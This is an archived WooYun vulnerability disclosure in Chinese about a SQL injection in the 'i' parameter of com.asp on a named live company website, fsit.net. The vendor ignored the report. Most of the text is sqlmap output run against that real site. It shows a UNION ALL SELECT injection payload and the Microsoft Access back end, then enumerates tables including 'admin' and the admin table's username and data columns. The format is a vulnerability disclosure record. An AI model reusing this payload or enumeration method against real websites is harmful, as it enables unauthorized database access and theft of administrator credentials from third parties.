乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-29: 细节已通知厂商并且等待厂商处理中 2015-02-03: 厂商已经主动忽略漏洞,细节向公众公开
抚顺经纬网络#注入一枚= =
漏洞地址:/com.asp?t=0&s=0&i=1参数i存在注入拿官网进行测试注入点:http://fsit.net/com.asp?t=0&s=0&i=1贴上过程
Place: GETParameter: i Type: UNION query Title: Generic UNION query (47) - 1 column Payload: t=0&s=0&i=-8586 UNION ALL SELECT CHR(58)&CHR(105)&CHR(102)&CHR(105)&CHR(58)&CHR(119)&CHR(102)&CHR(112)&CHR(67)&CHR(78)&CHR(119)&CHR(84)&CHR(101)&CHR(80)&CHR(98)&CHR(58)&CHR(97)&CHR(120)&CHR(121)&CHR(58) FROM MSysAccessObjects%00---[23:00:27] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access[23:00:27] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'[23:00:28] [WARNING] the SQL query provided does not return any output[23:00:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[23:00:28] [ERROR] cannot retrieve table names, back-end DBMS is Accessdo you want to use common table existence check? [Y/n/q] y[23:00:44] [INFO] checking table existence using items from 'D:\python\sqlmap\txt\common-tables.txt'[23:00:44] [INFO] adding words used on web page to the check listplease enter number of threads? [Enter for 1 (current)] 8[23:00:50] [INFO] starting 8 threads[23:00:55] [INFO] retrieved: admin[23:03:40] [INFO] retrieved: content[23:03:48] [INFO] retrieved: main[23:04:28] [INFO] retrieved: rootDatabase: Microsoft_Access_masterdb[4 tables]+---------+| admin || content || main || root |+---------+
Place: GETParameter: i Type: UNION query Title: Generic UNION query (47) - 1 column Payload: t=0&s=0&i=-8586 UNION ALL SELECT CHR(58)&CHR(105)&CHR(102)&CHR(105)&CHR(58)&CHR(119)&CHR(102)&CHR(112)&CHR(67)&CHR(78)&CHR(119)&CHR(84)&CHR(101)&CHR(80)&CHR(98)&CHR(58)&CHR(97)&CHR(120)&CHR(121)&CHR(58) FROM MSysAccessObjects%00---[23:09:13] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access[23:09:13] [ERROR] cannot retrieve column names, back-end DBMS is Accessdo you want to use common column existence check? [Y/n/q] y[23:09:17] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[23:09:17] [INFO] checking column existence using items from 'D:\python\sqlmap\txt\common-columns.txt'[23:09:17] [INFO] adding words used on web page to the check listplease enter number of threads? [Enter for 1 (current)] 8[23:09:20] [INFO] starting 8 threads[23:09:20] [INFO] retrieved: username[23:09:21] [INFO] retrieved: id[23:09:26] [INFO] retrieved: dataDatabase: Microsoft_Access_masterdbTable: admin[3 columns]+----------+-------------+| Column | Type |+----------+-------------+| data | non-numeric || id | numeric || username | non-numeric |+----------+-------------+
过滤
危害等级:无影响厂商忽略
忽略时间:2015-02-03 10:24
暂无